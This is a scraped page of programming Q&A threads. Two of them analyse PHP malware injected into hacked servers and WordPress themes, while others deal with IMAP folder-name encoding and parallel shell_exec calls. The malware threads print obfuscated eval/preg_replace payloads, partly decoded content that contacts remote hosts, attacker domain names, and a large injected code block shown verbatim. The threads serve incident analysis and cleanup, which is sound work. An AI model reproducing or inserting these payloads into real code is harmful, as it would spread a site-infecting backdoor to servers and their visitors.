Hacked site - encrypted code - php
Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
http://ddecode.com/
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
}
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.
Related
imap_mail_move() not working on special characters (äüö...)
I am using imap_mail_move() to move emails from one folder to another. This works pretty well, but not if it comes to special characters in the folder name. I am sure I need to encode the name, but all test where not succesful. Anybody that has a nice idea? Thanks in advance. class EmailReader { [...] function doMoveEmail($uid, $targetFolder) { $targetFolder = imap_utf8_to_mutf7($targetFolder); $return = imap_mail_move($this->conn, $uid, $targetFolder, CP_UID); if (!$return) { $this->printValue(imap_errors()); die("stop"); } return $return; } [...] } Calling the function in the script [...] $uid = 1234; $folderTarget1 = "INBOX.00_Korrespondenz"; $this->doMoveEmail($uid, $folderTarget1); $folderTarget2 = "INBOX.01_Anmeldevorgang.011_Bestätigungslink"; $this->doMoveEmail($uid, $folderTarget2); [...] The execution of the first call (folderTarget1) is working pretty well. The execution of the secound call (folderTarget2) is creating an error: [TRYCREATE] Mailbox doesn't exist: INBOX.01_Anmeldevorgang.011_Bestätigungslink (0.001 + 0.000 secs). Remark 1: if I call imap_list(), the name of the folder is shown as "INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" (=$val) using: $new = mb_convert_encoding($val,'UTF-8','UTF7-IMAP') echo $new; // gives --> "INBOX.01_Anmeldevorgang.011_Bestätigungslink" but: $new2 = mb_convert_encoding($new,'UTF7-IMAP', 'UTF-8') echo $new2; // gives --> "INBOX.01_Anmeldevorgang.011_Best&AOQ-tigungslink" Remark 2 I checked each possible encoding, with the following script, but none of them matchs the value that is returned by imap_list(). // looking for "INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" given by imap_list(). $targetFolder = "INBOX.01_Anmeldevorgang.011_Bestätigungslink"; foreach(mb_list_encodings() as $chr){ echo mb_convert_encoding($targetFolder, $chr, 'UTF-8')." : ".$chr."<br>"; }
Your folder name, as on the server, Besta&Awg-tigungslink is not canonically encoded: &Awg- decodes as the combining diaereses character. Using some convenient python to look it up: import base64 import unicode data x = base64.b64decode('Awg=').decode('utf-16be'); # equals added to satisfy base64 padding requirements unicodedata.name(x) # Returns 'COMBINING DIAERESIS' This combines with the a in front of it to show ä. Your encoder is returning the more common precomposed form: x = base64.b64decode('AOQ=').decode('utf-16be') unicodedata.name(x) # Returns: 'LATIN SMALL LETTER A WITH DIAERESIS' This is a representation of ä directly. Normally, when you work with IMAP folders, you pass around the raw name, and only convert the folder name for display. As you can see, there is not necessarily a one-way mapping from glyphs to encodings in unicode. It does surprise me that PHP does seem to be doing a canonicalization step when encoding; I would expect round tripping the same data to return the same thing.
I created a workaround, which helps me to work with UTF8-values and to translate it to the original (raw) IMAP folder name. function getFolderList() { $folders = imap_list($this->conn, "{".$this->server."}", "*"); if (is_array($folders)) { // Remove Server details of each element of array $folders = array_map(function($val) { return str_replace("{".$this->server."}","",$val); }, $folders); // Sort array asort($folders); // Renumber the list $folders = array_values($folders); // add UTF-8 encoded value to array // this is needed as the original value is so wiered, that it is not possible to encode it // with a function on the fly. This additional utf-8 value is needed to map the utf-8 value // to the original value. The original value is still needed to do some operations like e.g.: // - imap_mail_move() // - imap_reopen() // ==> the trick is to use normalizer_normalize() $return = array(); foreach ($folders as $key => $folder) { $return[$key]['original'] = $folder; $return[$key]['utf8'] = normalizer_normalize(mb_convert_encoding($folder,'UTF-8','UTF7-IMAP')); } return $return; } else { die("IMAP_Folder-List failed: " . imap_last_error() . "\n"); } }
Execute every N command in parallel in shell_exec() in PHP
I'd like to execute N commands in bash in parallel. And then the next N commands after all the commands finish, and then the next N commands … Because I am not an expert in shell scripting, I have resorted to PHP. But I suspect my code is not doing what I needed optimally: <?php // d() is a function like var_dump() d($d); $ips = array( "83.149.70.159:13012" => 8, "37.48.118.90:13082" => 77, "83.149.70.159:13082" => 77,); d($ips); reset($ips); $prx = "storm"; $f = array(); foreach ($d as $calln) { $ip = current($ips); $ipkey = key($ips); d($ip, $ipkey); $comd = choose_comd($prx); d( $comd); $f[] = shell_exec($comd); d($f); choose_limiting ($prx); d($GLOBALS['a']); } function choose_comd ($prx) { d($GLOBALS['calln']); switch ($prx) { case "storm": return "cd /Users/jMac-NEW/HoldingForDO/phub/phubalt_pages && curl -x {$GLOBALS['ipkey']} \"https://catalog.loc.gov/vwebv/search?searchArg={$GLOBALS['calln']}&searchCode=CALL%2B&searchType=1&limitTo=none&fromYear=&toYear=&limitTo=LOCA%3Dall&limitTo=PLAC%3Dall&limitTo=TYPE%3Dall&limitTo=LANG%3Dall&recCount=1200\" >trial_{$GLOBALS['calln']}_out.html 2> trial_{$GLOBALS['calln']}_error.txt &";; // more cases ... } function choose_limiting ($prx){ switch ($prx) { case "": if (!next($ips)) { sleep (80); reset($ips); } case "storm": if (!isset($GLOBALS['a'])) { echo "if"; $GLOBALS['a'] = 0; } elseif ($GLOBALS['a'] == current($GLOBALS['ips'])) { echo "elseif"; next($GLOBALS['ips']); sleep(80/count($GLOBALS['ips']) - 7); // 80 is the standard $GLOBALS['a'] = 0; } else { echo "else"; $GLOBALS['a']++; } } } function trying () { $GLOBALS['a']++; d($GLOBALS['a']); } Firstly, I am not sure if running a loop around shell_exec("command… &") will make all the commands run in parallel. Secondly, the loop runs around all the possible commands, but is made to sleep() with an arbitrary / estimated duration of 70 after every N commands are run with shell_exec(). 70 seconds sleep period may or may not correspond with the completion of all previous N commands that have been executed, but i am just assuming that it will be around there. May I know if what I have done has fulfilled my aim? If no, why? And what other solution is there? Actually I do not mind just using bash directly, but the problem is that every iteration of loop is supposed to be fed with a variable $calln from a php array $d populated in earlier parts of the script not shown. If PHP can do what I need, pls stick to PHP.
Malicious code found in WordPress theme files. What does it do?
I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} #erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f###%V,6<